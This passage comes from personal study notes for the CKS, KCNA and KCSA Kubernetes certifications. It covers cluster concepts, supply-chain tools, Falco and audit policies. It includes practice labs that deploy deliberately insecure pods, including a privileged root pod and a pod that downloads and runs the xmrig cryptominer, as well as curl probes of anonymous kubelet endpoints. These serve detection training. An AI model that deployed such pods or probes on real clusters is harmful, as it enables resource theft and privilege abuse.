    requests.cpu: "0.5"
    requests.memory: 500Mi
    limits.cpu: "1"
    limits.memory: 1Gi
apiVersion: v1
kind: ResourceQuota
metadata:
name: pods-medium
spec:
    hard:
      cpu: "10"
      memory: 20Gi
      pods: "10"
scopeSelector:
  matchExpressions:
  - operator : In
    scopeName: PriorityClass
    values: ["medium"]

API Priority and Fairness

  • https://kubernetes.io/docs/concepts/cluster-administration/flow-control/
  • With API Priority and Fairness, you can define which resources need to be prioritized over others in regards to requests to the KubeAPI server
  • To configure API Priority and Fairness, you create a PriorityLevelConfiguration object:
      ? Is this still supported? Is it an exam topic? I cannot find the manifest spec.
    

Pod Priority and Preemption

  • With Pod Priority and Preemption, you can ensure that critical pods are running while the cluster is under resource contention by killing lower priority pods
  • To implement Pod Priority and Preemption:
    • Create a priorityClass object (or several):
      apiVersion: scheduling.k8s.io/v1
      kind: PriorityClass
      metadata:
        name: high-priority
      value: 1000000
      globalDefault: false
      description: "This priority class should be used for XYZ service pods only."
      ---
          apiVersion: scheduling.k8s.io/v1
      kind: PriorityClass
      metadata:
        name: low-priority
      value: 100
      globalDefault: false
      description: "This priority class should be used for XYZ service pods only."
      
    • Assign the priorityClass to a pod:
      apiVersion: v1
      kind: Pod
      metadata:
        name: nginx
        labels:
          env: test
      spec:
        containers:
        - name: nginx
          image: nginx
          imagePullPolicy: IfNotPresent
        priorityClassName: high-priority
      

Pod to Pod Encryption

  • mTLS can be used to encrypt traffic between pods
  • Methods of p2p encryption
    • Service Mesh
      • Service Mesh can offload the encryption and decryption of traffic between pods by using a sidecar proxy
      • Examples:
        • Istio
          • Istio uses Envoy as a sidecar proxy
          • Istio uses a sidecar proxy to encrypt traffic between pods
        • Linkerd
    • Wireguard
      • Cilium
        • uses eBPF for network security
        • Encrytion is transparent to the application
        • Provides flexible encryption options
    • IPSec
      • Calico

5 Supply Chain Security

SBOM

  • Supply chain security is the practice of ensuring that the software and hardware that you use in your environment is secure
  • In the context of the CKS exam, supply chain security refers to the security of the software that you use in your Kubernetes environment

Reduce docker image size

  • Smaller images are faster to download and deploy

  • Smaller images are more secure

  • Smaller images are easier to manage

  • To reduce the size of a docker image:

    • Use a smaller base image
    • Use specific package/image versions
    • Make file-system read-only
    • Don’t run the container as root
    • Use multi-stage builds
    • Remove unnecessary files
    • Use a .dockerignore file to exclude files and directories from the image
    • Use COPY instead of ADD
    • Use alpine images
    • Use scratch images
    • Use distroless images
  • Example of a multi-stage build:

    # build container stage 1
      FROM ubuntu
      ARG DEBIAN_FRONTEND=noninteractive
      RUN apt-get update && apt-get install -y golang-go
      COPY app.go .
      RUN CGO_ENABLED=0 go build app.go
    
    # app container stage 2
      FROM alpine:3.12.1 # it is better to use a defined tag, rather than 'latest'
      RUN addgroup -S appgroup && adduser -S appuser -G appgroup -h /home/appuser
      COPY --from=0 /app /home/appuser/app
      USER appuser # run as a non-root user
      CMD ["/home/appuser/app"]
    
  • Dockerfile best practices: https://docs.docker.com/build/building/best-practices/

  • Only certain docker directives create new layers in an image

    • FROM
    • COPY
    • CMD
    • RUN
  • dive and docker-slim are two tools you can use to explore the individual layers that make up an image

Static Analysis

SBOM

  • A SBOM is a list of all the software that makes up a container image (or an application, etc.)
  • Formats
    • SPDX
      • The standard format for sharing SBOM
      • Available in JSON, RDF, and tag/value formats
      • More complex than CycloneDX due to it’s extensive metadata coverage
      • Comprehensive metadata including license information, origin, and file details
    • CycloneDX
      • A lightweight format focused on security and compliance
      • Available in JSON and XML formats
      • Simpler and more focused on essential SBOM elements
      • Focuses on component details, vulnerabilities, and dependencies

Kubesec

  • Used for static analysis of manifests
  • https://github.com/controlplaneio/kubesec

Syft

  • Syft is a powerful and easy-to-use open-source tool for generating Software Bill of Materials (SBOMs) for container images and filesystems. It provides detailed visibility into the packages and dependencies in your software, helping you manage vulnerabilities, license compliance, and software supply chain security.
  • Syft can export results in SPDX, CycloneDX, JSON, etc.
  • To scan an image with syft and export the results to a file in SPDX format:
    syft scan docker.io/kodekloud/webapp-color:latest -o spdx --file /root/webapp-spdx.sbom
    

Grype

  • Grype is a tool (also from Anchore) that can be used to scan SBOM for vulnerabilities
  • To scan a SBOM with Grype:
    grype /root/webapp-sbom.json -o json --file /root/grype-report.json
    

Kube-linter

  • Kube-linter can be used to lint Kubernetes manifests and ensure best practices are being followed
  • kube-linter is configurable. You can disable/enable checks and even create your own custom checks
  • kube-linter includes recommendations for how to fix failed checks
  • https://github.com/stackrox/kube-linter

Scanning Images for Vulnerabilities

trivy

  • trivy can be used to scan images, git repos, and filesystems for vulnerabilities
  • https://github.com/aquasecurity/trivy
  • Example:
      sudo docker run --rm  aquasec/trivy:0.17.2 nginx:1.16-alpine
    

6 Monitoring, Logging, and Runtime Security

falco

  • Falco is an IDS for Kubernetes workloads
  • falco is a cloud native security tool. It provides near real-time threat detection for cloud, container, and Kubernetes workloads by leveraging runtime insights. Falco can monitor events defined via customizable rules from various sources, including the Linux kernel, and enrich them with metadata from the Kubernetes API server, container runtime, and more. Falco supports a wide range of kernel versions, x86_64 and ARM64 architectures, and many different output channels.
  • falco uses sydig filters to extract information about an event. They are configured in the falco rules.yaml or configmap. They can also be passed via helm values.
    • /etc/falco/falco.yaml - the main configuration file for falco
    • /etc/falco/falco_rules.yaml - the main rules file for falco
  • falco rule files consist of 3 elements defined in YAML:
    • rules - a rule is a condition under which an alert should be generated
    • macros - a macro is a reusable rule condition. These help keep the rules file clean and easy to read
    • lists - a collection of items that can be used in rules and macros
  • Some examples of events that falco watches for:
    • Reading or writing files at a specific location in the filesystem
    • Opening a shell binary for a container, such as /bin/bash
    • Sending/receives traffic from undesired URLs
  • Falco deploys a set of sensors that listen for configured events and conditions
    • Each sensor contains a set of rules that map an event to a data source.
    • An alert is produced when a rule matches a specific event
    • Alerts are then sent to an output channel to record the event

Ensuring Container Immutability

  • Containers should be immutable. This means that once a container is created, it should not be changed. If changes are needed, a new container should be created.
  • Containers are mutable (changeable) by default. This can lead to security vulnerabilities.
  • To ensure container immutability:
    • Use a ‘distroless’ container image. These images are minimal and contain only the necessary components to run an application. They do not include a shell.
    • Use a ‘read-only’ file system. This prevents changes to the file system. To configure a read-only file system, add the following to the pod spec:
      spec:
        containers:
        - name: my-container
          image: my-image
          securityContext:
            readOnlyRootFilesystem: true
      

Audit Logs

  • Auditing involves recording and tracking all events and actions within the cluster
  • Who made a change, when was it changed, and what exactly was changed
  • Audit logs provide a chronological record of activities within a cluster
  • Entries in the audit log exist in ‘JSON Lines’ format. Note that this is not the same as JSON. Each line in the log is a separate JSON object.
  • Types of Audit Policies:
    • None - no logging
    • Metadata - Logs request metadata, but not request or response body
    • Request - Logs request metadata and request body, but no response body
    • Request/Response - Logs the metadata, request body, and response body

Sample Audit Policy

```
apiVersion: audit.k8s.io/v1 # This is required.
kind: Policy
omitStages:
  - "RequestReceived"
rules:
  # Log pod changes at RequestResponse level
  - level: RequestResponse
    resources:
    - group: ""
      # Resource "pods" doesn't match requests to any subresource of pods,
      # which is consistent with the RBAC policy.
      resources: ["pods"]
  # Log "pods/log", "pods/status" at Metadata level
  - level: Metadata
    resources:
    - group: ""
      resources: ["pods/log", "pods/status"]

  # Don't log requests to a configmap called "controller-leader"
  - level: None
    resources:
    - group: ""
      resources: ["configmaps"]
      resourceNames: ["controller-leader"]

  # Don't log watch requests by the "system:kube-proxy" on endpoints or services
  - level: None
    users: ["system:kube-proxy"]
    verbs: ["watch"]
    resources:
    - group: "" # core API group
      resources: ["endpoints", "services"]

  # Don't log authenticated requests to certain non-resource URL paths.
  - level: None
    userGroups: ["system:authenticated"]
    nonResourceURLs:
    - "/api*" # Wildcard matching.
    - "/version"

  # Log the request body of configmap changes in kube-system.
  - level: Request
    resources:
    - group: "" # core API group
      resources: ["configmaps"]
    # This rule only applies to resources in the "kube-system" namespace.
    # The empty string "" can be used to select non-namespaced resources.
    namespaces: ["kube-system"]

  # Log configmap and secret changes in all other namespaces at the Metadata level.
  - level: Metadata
    resources:
    - group: "" # core API group
      resources: ["secrets", "configmaps"]

  # Log all other resources in core and extensions at the Request level.
  - level: Request
    resources:
    - group: "" # core API group
    - group: "extensions" # Version of group should NOT be included.

  # A catch-all rule to log all other requests at the Metadata level.
  - level: Metadata
    # Long-running requests like watches that fall under this rule will not
    # generate an audit event in RequestReceived.
    omitStages:
      - "RequestReceived"
```
  • Once the audit policy has been defined, you can apply it to the cluster by passing the --audit-policy-file flag to the kube-apiserver
  • To use a file-based log backend, you need to pass 3 configurations to the kube-apiserver:
    • --audit-policy-file - this is the path to the audit policy file
    • --audit-log-path - this is the path to the audit log file
    • both of these paths needs to be mounted in the kube-apiserver. The kube-apiserver cannot read these files on the node without a proper volumeMount

Kubernetes Security Specialist (CKS) Practice Scenarios

Scenario 1: Prevent Privilege Escalation

Objective: Ensure a pod cannot escalate privileges or run as root.

Problem Statement:

You have been given a pod specification that allows a container to run as root. Your task is to:

  1. Modify the pod spec to ensure it runs as a non-root user.
  2. Apply a PodSecurityPolicy (if using older versions) or Pod Security Admission (PSA) to enforce this restriction.

Pod spec to modify:

cat << EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: insecure-pod
  labels:
    app: insecure
spec:
  containers:
  - name: insecure-container
    image: busybox
    command: ["sleep", "3600"]
    securityContext:
      privileged: true  # Allows full access to the host (needs to be removed)
      runAsUser: 0      # Runs as root (needs to be changed)
      capabilities:
        add: ["NET_ADMIN", "SYS_ADMIN"]  # Grants unnecessary capabilities
EOF
💡 Hints
  • Use securityContext.runAsNonRoot: true
  • Use securityContext.capabilities.drop: ["ALL"]
  • If using PSA, enforce the restricted profile.

Expected Outcome:

  • The pod should not run as root.
  • Any attempt to run a root-level container should be denied.

Scenario 2: Detect and Mitigate a Cryptojacking Attack

Objective: Identify and remove a malicious pod mining cryptocurrency.

Problem Statement:

A newly deployed pod has been consuming a high amount of CPU resources without any declared resource limits. Upon investigation, it appears to be running a cryptomining process (xmrig). Your tasks:

  1. Identify the pod consuming excessive CPU.
  2. Inspect the container and confirm it is mining cryptocurrency.
  3. Mitigate the issue by removing the pod and applying security policies to prevent future attacks.

Deploy a malicious pod:

cat << EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: cryptominer
  labels:
    app: cryptominer
spec:
  containers:
  - name: cryptominer-container
    image: ubuntu
    command: ["/bin/sh", "-c", "apt update && apt install -y curl && curl -sL https://github.com/xmrig/xmrig/releases/latest/download/xmrig -o /usr/local/bin/xmrig && chmod +x /usr/local/bin/xmrig && /usr/local/bin/xmrig"]
    resources:
      requests:
        cpu: "500m"
      limits:
        cpu: "2000m"
EOF
💡 Hints
  • Use kubectl top pod --sort-by=cpu to find high CPU-consuming pods.
  • Use kubectl exec -it <pod> -- ps aux to check running processes.
  • Consider Network Policies to restrict outbound traffic.
  • Apply ResourceQuotas and LimitRanges to prevent overuse.

Expected Outcome:

  • The malicious pod should be deleted.
  • Future unauthorized mining activities should be restricted using security policies.

Scenario 3: Restrict Container Networking

Objective: Implement a network policy to isolate an application from unauthorized access.

Problem Statement:

Your application pod (web-app) should only communicate with the database (db) pod. Other pods should not be able to access web-app. Implement a NetworkPolicy to enforce this restriction.

cat << EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: web-app
  labels:
    app: web-app
spec:
  containers:
  - name: web-container
    image: nginx
    ports:
    - containerPort: 80
---
apiVersion: v1
kind: Pod
metadata:
  name: db
  labels:
    app: db
spec:
  containers:
  - name: db-container
    image: mysql
    ports:
    - containerPort: 3306
--- 
apiVersion: v1
kind: Pod
metadata:
  name: attacker
  labels:
    app: attacker
spec:
  containers:
  - name: attacker-container
    image: busybox
    command: ["sleep", "3600"]
EOF
💡 Hints
  • Create a NetworkPolicy that allows traffic from db to web-app.
  • Deny all ingress traffic by default.
  • Use kubectl run busybox --rm -it --image=busybox sh to test connectivity.

Expected Outcome:

  • Only db can communicate with web-app.
  • Any external pod trying to access web-app should be denied.

Scenario 4: Protect Secrets in Kubernetes

Objective: Ensure Kubernetes secrets are stored and accessed securely.

Problem Statement:

An application pod is reading a Kubernetes secret (db-password). Your security audit revealed:

  1. The secret is mounted as a plain text environment variable.
  2. Developers are retrieving secrets using kubectl get secrets.

Your tasks:

  • Modify the pod spec to mount the secret as a file instead of an environment variable.
  • Restrict access to secrets by applying RBAC policies.
cat << EOF | kubectl create -f -
apiVersion: v1
kind: Secret
metadata:
  name: db-secret
type: Opaque
data:
  username: dXNlcg==  # Base64 encoded "user"
  password: c2VjdXJlcGFzcw==  # Base64 encoded "securepass"
---
apiVersion: v1
kind: Pod
metadata:
  name: insecure-pod
spec:
  containers:
  - name: app-container
    image: busybox
    command: [ "sh", "-c", "env | grep DB_" ]
    env:
    - name: DB_USERNAME
      valueFrom:
        secretKeyRef:
          name: db-secret
          key: username
    - name: DB_PASSWORD
      valueFrom:
        secretKeyRef:
          name: db-secret
          key: password
EOF
💡 Hints
  • Use volumeMounts and volumes instead of env.
  • Implement RBAC to restrict access to kubectl get secrets.

Expected Outcome:

  • The application still retrieves the secret, but in a more secure manner.
  • Unauthorized users cannot list secrets.

Scenario 5: Detect and Block Unauthorized Container Images

Objective: Restrict pod deployments to approved images only.

Problem Statement:

A developer accidentally deployed an image from Docker Hub (nginx:latest) instead of using the company’s private registry (registry.example.com/nginx:latest). You need to:

  1. Detect and delete unauthorized images.
  2. Implement Gatekeeper to enforce image restrictions.

Steps:

  1. Deploy Gatekeeper
kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/v3.18.2/deploy/gatekeeper.yaml
  1. Deploy a constraint template and constraint to restrict images:

  2. Deploy non-compliant pod(s) and see the result:

cat << EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: unauthorized-pod
  labels:
    app: unauthorized
spec:
  containers:
  - name: nginx-container
    image: nginx:latest
    ports:
    - containerPort: 80
EOF
💡 Hints
  • Use kubectl get pods -o jsonpath='{.items[*].spec.containers[*].image}' to find all running images.
  • Install Gatekeeper with Open Policy Agent (OPA) to enforce policies.

Expected Outcome:

  • Unauthorized images should be flagged and removed.
  • Only images from whatever.registry.com should be allowed.

KCNA

Directory Map

Kubernetes Certified Native Associate (KCNA) Notes

portfolio_view

portfolio_view

https://www.cncf.io/certification/kcna/

Kubernetes Certified Native Associate (KCNA) Notes

Table of Contents

Exam

Outline

https://github.com/cncf/curriculum/blob/master/KCNA_Curriculum.pdf

Changes

Preparation

Study Resources

https://learn.kodekloud.com/user/courses/kubernetes-and-cloud-native-associate-kcna https://amazon.com/KCNA-Book-Kubernetes-Native-Associate/dp/1916585035

Practice

https://learn.kodekloud.com/user/courses/kubernetes-and-cloud-native-associate-kcna https://tutorialsdojo.com/kubernetes-and-cloud-native-associate-kcna-sample-exam-questions/

Kubernetes Fundamentals

Pods

  • A pod is the smallest deployable unit in Kubernetes. A Pod represents a single instance of a running process in your cluster.
  • Pods deploy a container image on a Kubernetes cluster as a running instance of an application.
  • A pod can contain more than one container.
    • An example use case would be a pod that contains a web server and a sidecar container that collects logs for the web server container.
  • A pod can be deployed by using kubectl or by creating a YAML manifest:
    • Kubectl example:
    kubectl run my-pod --image=my-image
    
    • YAML manifest example:
    apiVersion: v1
    kind: Pod
    metadata:
      name: my-pod
    spec:
    - containers:
      - name: my-container
        image: my-image
    
  • You can view pods running in a cluster by using the following command:
    kubectl get pods
    
    • You can view detailed information about a pod by using the following command:
    kubectl describe pod my-pod
    

ReplicaSets

  • A ReplicaSet ensures that a specified number of pod replicas are running at any given time.
  • A ReplicaSet is defined by a YAML manifest that specifies the number of replicas to maintain.
  • A ReplicaSet can be deployed by creating a YAML manifest:
    • Kubectl example:
    kubectl create -f my-replicaset.yaml
    
  • Replication Controllers are an older version of ReplicaSets and are being replaced.
  • You can view ReplicaSets running in a cluster by using the following command:
    kubectl get replicaset
    
    • You can view detailed information about a ReplicaSet by using the following command:
    kubectl describe replicaset my-replicaset
    

Deployments:

  • A Deployment is a higher-level concept that manages ReplicaSets and provides declarative updates to Pods along with a lot of other useful features.
  • A Deployment is defined by a YAML manifest that specifies the desired state of the deployment.
  • A Deployment can be deployed by creating a YAML manifest or imperatively using kubectl:
    • YAML example:
    kubectl create -f my-deployment.yaml
    
  • You can view Deployments running in a cluster by using the following command:
    kubectl get deployments
    
  • You can view detailed information about a Deployment by using the following command:
    kubectl describe deployment my-deployment
    
  • Rolling updates can be performed on a Deployment by updating the Deployment’s YAML manifest and applying the changes:

ReplicaSet vs Deployment:

  • ReplicaSets are a lower-level concept that manages Pods and ensures a specified number of pod replicas are running at any given time.
  • Deployments are a higher-level concept that manage ReplicaSets and provide declarative updates to Pods along with a lot of other useful features.

Kubernetes Namespaces

  • Namespaces are a way to divide cluster resources between multiple users.
  • Namespaces can be used to organize resources and provide a way to scope resources.
  • Namespaces can be used to create resource quotas and limit the amount of resources a user can consume.
  • Namespaces can be used to create network policies and limit the network traffic between pods.
  • Namespaces can be used to create role-based access control (RBAC) policies and limit the permissions of users.

Imperative vs Declarative

  • Imperative:
    • Imperative commands are used to perform a specific task.
    • An example of an imperative command would be to create a pod using kubectl run.
    • Imperative commands are useful for quick tasks and testing.
  • Declarative:
    • Declarative commands are used to define the desired state of a resource.
    • An example of a declarative command would be to create a pod using a YAML manifest.
    • Declarative commands are useful for managing resources in a production environment.

Scheduling

  • Scheduling is the process of assigning pods to nodes in a Kubernetes cluster.
  • The Kubernetes scheduler is responsible for scheduling pods to nodes based on resource requirements and constraints.
  • The scheduler uses a set of policies to determine where to place pods in the cluster.
  • The scheduler can be configured to use different scheduling algorithms and policies.
  • The scheduler can be extended with custom scheduling plugins.
  • To schedule a pod, the scheduler evaluates the pod’s resource requirements, affinity and anti-affinity rules, taints and tolerations, and other constraints. It then selects a node that meets the requirements and assigns the pod to that node by updating the spec.nodeName field in the pod’s manifest.

Labels and Selectors

  • Labels are key-value pairs that are attached to objects in Kubernetes.
  • Labels can be used to organize and select objects in Kubernetes.
  • Labels can be used to filter and group objects in Kubernetes.
  • Labels can be used to create selectors that match objects based on their labels.
  • Selectors are used to select objects in Kubernetes based on their labels.
  • Selectors can be used to filter objects based on their labels.
  • Selectors can be used to group objects based on their labels.
  • Selectors can be used to create sets of objects that match a specific label query.

Taints and Tolerations

  • Taints are used to repel pods from nodes in a Kubernetes cluster.
  • We apply a taint to a node (as a key-value pair). Any pods that do not have a toleration for that taint will not be scheduled on that node.

Node Selectors

  • Node selectors are used to constrain which nodes a pod is eligible to be scheduled based on labels on the node.
  • Node selectors are used to filter nodes based on their labels.
  • To use a node selector, you add a nodeSelector field to the pod’s spec that specifies a set of key-value pairs that must match the labels on the node.
  • Example:
apiVersion: v1
kind: Pod
metadata:
  name: my-pod
spec:
  containers:
  - name: my-container
    image: my-image
  nodeSelector:
    disktype: ssd

Node Affinity

  • Node affinity is a way to constrain which nodes a pod is eligible to be scheduled based on labels on the node.
  • Node affinity is similar to node selectors but provides more control over how pods are scheduled.
  • Node affinity can be used to specify required and preferred rules for node selection.
  • Node affinity can be used to specify rules that match or do not match nodes based on their labels.
  • Node affinity can be used to specify rules that match or do not match nodes based on their topology.
  • Example:
apiVersion: v1
kind: Pod
metadata:
  name: my-pod
spec:
  containers:
  - name: my-container
    image: my-image
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: disktype
            operator: In
            values:
            - ssd

Requests and Limits

  • Requests and limits are used to specify the amount of resources a pod requires and the maximum amount of resources a pod can consume.
  • Requests are used to specify the amount of resources a pod requires to run.
  • Limits are used to specify the maximum amount of resources a pod can consume.
  • Requests and limits can be specified for CPU and memory resources.
  • Requests and limits can be specified in the pod’s spec.
  • Example:
apiVersion: v1
kind: Pod
metadata:
  name: my-pod
spec:
  containers:
  - name: my-container
    image: my-image
    resources:
      requests:
        memory: "64Mi"
        cpu: "250m"
      limits:
        memory: "128Mi"
        cpu: "500m"

DaemonSets

  • DaemonSets are used to run a copy of a pod on all nodes in a Kubernetes cluster.
  • DaemonSets are used to run system daemons and other background tasks on all nodes.
  • DaemonSets are defined by a YAML manifest that specifies the pod template to use.
  • DaemonSets can be deployed by creating a YAML manifest:
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: my-daemonset
spec:
  selector:
    matchLabels:
      app: my-daemonset
  template:
    metadata:
      labels:
        app: my-daemonset
    spec:
      containers:
      - name: my-container
        image: my-image

Static Pods

  • Static Pods are pods that are managed by the kubelet on a node.
  • Static Pods are defined by a file on the node’s filesystem.
  • Static Pods are not managed by the Kubernetes API server.
  • Static Pods are useful for running system daemons and other background tasks on a node.
  • Static Pods are defined by a file in the /etc/kubernetes/manifests directory on the node.
  • Static Pods are created and managed by the kubelet on the node.

Multiple Schedulers

  • Kubernetes supports multiple schedulers that can be used to schedule pods in a cluster.
  • You can even create your own schedule and use it to schedule pods in a cluster.

Authentication

  • Authentication is the process of verifying the identity of a user or system.
  • Kubernetes supports multiple authentication methods, including:
    • X.509 client certificates
    • Static tokens
    • Service accounts
    • OpenID Connect tokens
    • Webhook tokens

authorization

  • Authorization is the process of determining what actions a user or system is allowed to perform.
  • Kubernetes supports multiple authorization methods, including:
    • Role-based access control (RBAC)
    • Attribute-based access control (ABAC)

API Groups

  • API groups are used to organize resources in Kubernetes.
  • API groups are used to group related resources together.
  • API groups that you will commonly use:
    • core: Contains core resources like pods, services, and namespaces.
    • apps: Contains higher-level resources like deployments, replica sets, and stateful sets.
    • batch: Contains resources like jobs and cron jobs.
    • extensions: Contains deprecated resources like replica sets and daemon sets.
    • networking.k8s.io: Contains resources like network policies and ingresses.
    • storage.k8s.io: Contains resources like storage classes and persistent volume claims.
    • rbac.authorization.k8s.io: Contains resources like roles and role bindings.
    • metrics.k8s.io: Contains resources like pod metrics.
    • autoscaling: Contains resources like horizontal pod autoscalers.
    • admissionregistration.k8s.io: Contains resources like mutating webhooks and validating webhooks.
  • Example:
curl -k https://<master-ip>:6443/apis/apps/v1

Role Based Access Control (RBAC)

  • Role-based access control (RBAC) is a method of restricting access to resources based on the roles of users or systems.

Service Accounts

  • Service Accounts are created and managed by the Kubernetes API and can be used for machine authentication
  • To create a service account: kubectl create serviceaccount <account name>
  • Service accounts are namespaced
  • When a service account is created, it has a token created automatically. The token is stored as a secret object.
  • You can also use the base64 encoded token to communicate with the Kube API Server: curl https://172.16.0.1:6443/api -insecure --header "Authorization: Bearer <token value>"
  • You can grant service accounts permission to the cluster itself by binding it to a role with a rolebinding. If a pod needs access to the cluster where it is hosted, you you configure the automountServiceAccountToken boolean parameter on the pod and assign it a service account that has the appropriate permissions to the cluster. The token will be mounted to the pods file system, where the value can then be accessed by the pod. The secret is mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.
  • A service account named ‘default’ is automatically created in every namespace
  • As of kubernetes 1.22, tokens are automatically mounted to pods by an admission controller as a projected volume.
    • https://github.com/kubernetes/enhancements/blob/master/keps/sig-auth/1205-bound-service-account-tokens/README.md
  • As of Kubernetes 1.24, when you create a service account, a secret is no longer created automatically for the token. Now you must run kubectl create token <service account name> to create the token.
    • https://github.com/kubernetes/enhancements/issues/2799

Container Orchestration

Cluster Networking

  • A kubernetes cluster consists of master and worker nodes. Each node must have a network interface with a valid IP address configured. Each host must be connected to a network.
  • Certain TCP/UDP ports are required to be open:
    • 6443/tcp
    • 10250/tcp
    • 10251/tcp
    • 10252/tcp
    • 2379/tcp
    • 2380/tcp
    • 30000-32767/tcp

Pod Networking

  • Every requires an IP address
  • Every pod in the cluster should be able to reach every other pod without using NAT

CNI

  • Container Network Interface
  • Container Network Interface (CNI) is a framework for dynamically configuring networking resources. It uses a group of libraries and specifications written in Go. The plugin specification defines an interface for configuring the network, provisioning IP addresses, and maintaining connectivity with multiple hosts.

DNS

  • Domain Name Service
  • Used to resolve names to IP addresses
  • CoreDNS is the default DNS service used in Kubernetes

Ingress

Services

  • Services are like a load balancer. They load balance traffic to backend pods (referred to as endpoints)
  • There are 3 types of services in Kubernetes
    • ClusterIP
      • the default
      • The service IP address is only available inside the cluster
    • NodePort
      • Makes the service accessible on a predefined port on all nodes in the cluster
    • LoadBalancer
      • Provisions a load balancer in a cloud environment to make the service accessible

Sidecars

  • Sidecars are a secondary container running inside our pod that provide a service for the primary pod
  • An example is a container in our pod that ships logs to an external service for the business-logic container

Envoy

Storage

Cloud Native Architecture

Autoscaling

  • Horizontal Pod Autoscaler (HPA)
    • Automatically scales the number of pods in a deployment based on CPU utilization or custom metrics
  • Vertical Pod Autoscaler (VPA)
    • Automatically adjusts the CPU and memory requests and limits for a pod based on its usage
  • Cluster Autoscaler
    • Automatically adjusts the number of nodes in a cluster based on resource demands

Kubernetes KEPs and SIGs

  • Kubernetes Enhancement Proposals (KEPs) are used to propose and track major changes to Kubernetes
  • Special Interest Groups (SIGs) are used to organize contributors around specific areas of the project

Cloud Native Application Delivery

GitOps

  • What is GitOps

  • GitOps Principles
    • Declarative - The entire system must be described desclaritively
    • Versioned/Immutable -
    • Pulled Automatically - Changes must be applied automatically
    • Continuously Reconciled - Monitor desired state vs. actual state and reconcile if needed

Observability

Prometheus

  • Prometheus is an open-source monitoring and alerting system
  • Prometheus scrapes metrics from instrumented jobs and stores them in a time-series database
  • Prometheus provides a query language (PromQL) to query and visualize the collected metrics
  • Prometheus can be integrated with Grafana for visualization
  • Prometheus can be used to monitor Kubernetes clusters and applications running on Kubernetes
  • Prometheus is designed to collect numeric database, not logs.
  • Exporters run on the nodes and expose metrics to Prometheus
  • Prometheus scrapes the metrics from the exporters

KCSA

Directory Map

Kubernetes Certified Security Associate (KCSA) Notes

portfolio_view

portfolio_view

https://www.cncf.io/certification/kcsa/

Kubernetes Certified Security Associate (KCSA) Notes

Table of Contents

Exam

Outline

  • Exam Duration: 2 hours
  • Number of Questions: 50
  • Question Format: Multiple choice
  • Passing Score: 66%
  • Exam Cost: $300

Changes


Preparation

Study Resources

Practice

Introduction

The Kubernetes and Cloud Native Security Associate (KCSA) certification prepares individuals to secure Kubernetes environments and address modern cloud-native security challenges. This document consolidates core concepts, threat models, compliance standards, and best practices.


Overview of Cloud Native Security

4Cs of Cloud Native Security

  1. Code: Secure development practices (e.g., avoid hardcoding secrets).
  2. Container: Prevent privilege escalation, use minimal base images.
  3. Cluster: Restrict API server access, encrypt etcd data.
  4. Cloud: Use cloud-native tools for monitoring and securing infrastructure.

Cluster Security

  • Harden the Kubernetes API server with role-based access control (RBAC).
  • Disable anonymous authentication for kubelet communication.

Pod Security

  • Use Pod Security Admission (PSA) to enforce best practices (e.g., no root users).
  • Isolate sensitive workloads using namespaces and network policies.

Code Security

  • Use static code analysis tools like SonarQube or Codacy.
  • Store secrets securely using Kubernetes Secrets.

Kubernetes Threat Models

Attack Vectors

  • Privilege Escalation: Exploiting weak RBAC configurations.
  • Unauthorized Access: Using misconfigured service accounts.
  • Data Theft: Exploiting unencrypted volumes or exposed secrets.

Mitigations

  • Apply principle of least privilege with RBAC.
  • Use encryption for both data at rest and in transit.
  • Regularly scan images for vulnerabilities.

Platform Security

Supply Chain Security

  • Use SBOMs (Software Bill of Materials) to track dependencies.
  • Sign container images using tools like Cosign.

Artifact and Image Security

  • Enforce vulnerability scanning with tools like Trivy or Clair.
  • Ensure images come from trusted registries.

Policy Enforcement

  • Use tools like Kyverno and OPA Gatekeeper to validate deployments.
  • Enforce policies for image signatures, namespace isolation, and resource quotas.

Compliance Frameworks

GDPR

  • Encrypt sensitive user data in transit and at rest.
  • Implement RBAC to restrict access to personal data.

HIPAA

  • Ensure secure handling of healthcare information using TLS and encrypted storage.
  • Log and monitor access to healthcare data.

PCI DSS

  • Segment payment data workloads with network policies.
  • Regularly audit access controls and encryption compliance.

CIS Benchmarks

  • Use kube-bench to check Kubernetes against CIS recommendations.
  • Ensure secure API server and etcd configurations.

Threat Modeling

STRIDE Framework

  • Spoofing: Prevent by enforcing strong authentication (e.g., mTLS).
  • Tampering: Ensure data integrity with digital signatures.
  • Information Disclosure: Encrypt all sensitive data.
  • Denial of Service: Use resource quotas and rate limits.

MITRE ATT&CK Framework

  • Focuses on real-world attack scenarios.
  • Categories include Initial Access, Persistence, Privilege Escalation, and Defense Evasion.

Observability and Incident Response

Monitoring and Logging

  • Use Prometheus for metrics collection and alerting.
  • Use Fluentd or Elasticsearch for log aggregation and search.

Incident Investigation Tools

  • Use Falco for runtime security alerts.
  • Use Zeek and Snort for network intrusion detection.

Kubernetes Cluster Component Security

  • Use TLS to ensure all traffic between cluster control-plane components is encrypted

Kube-API Server

  • Kube-API server is at the center of all operations in a Kubernetes cluster
  • In regards to security, we need to make 2 decisions, who can access the cluster, and what can they do?
    • Certificates
    • LDAP
    • Service Accounts
  • Once they gain access to the cluster, what they can do is defined by authorization mechanisms:
    • RBAC
    • ABAC

Controller Manager and Scheduler

  • Controller manager ensures nodes are healthy, manages pods and controllers, etc.
  • The scheduler determines where (on which nodes) the pods can run on in a cluster
  • To protect either of these components, you need to isolate them.

Kubelet

  • Kubelet runs on the worker nodes and manages the node
  • Kubelet registers the node with the control-plane
  • Kubelet listens on 2 ports:
    • 10250: Serves API that allows full access
    • 10255: Serves API that allows unauthenticated, read-only access
  • By default, kubelet allows anonymous access to it’s API.
    • curl -sk https://nodename:10250/pods/
    • curl -sk https://nodename:10250/logs/syslog/
    • curl -sk https://nodename:10255/metrics/
    • This can be disabled by setting anonymous-auth=false in the kubelet config
    • Kubelet supports 2 types of authentication, bearer token and certificate-based

Security the Container Runtime

  • The container runtime is responsible for running the containers
  • CRI (Container Runtime Interface) allows Kubernetes to use any container runtime that is compliant with CRI
  • The most common container runtime is Docker, but others include containerd, cri-o, etc.
  • You should configure pods and containers to run with least privileges by configuring the security context
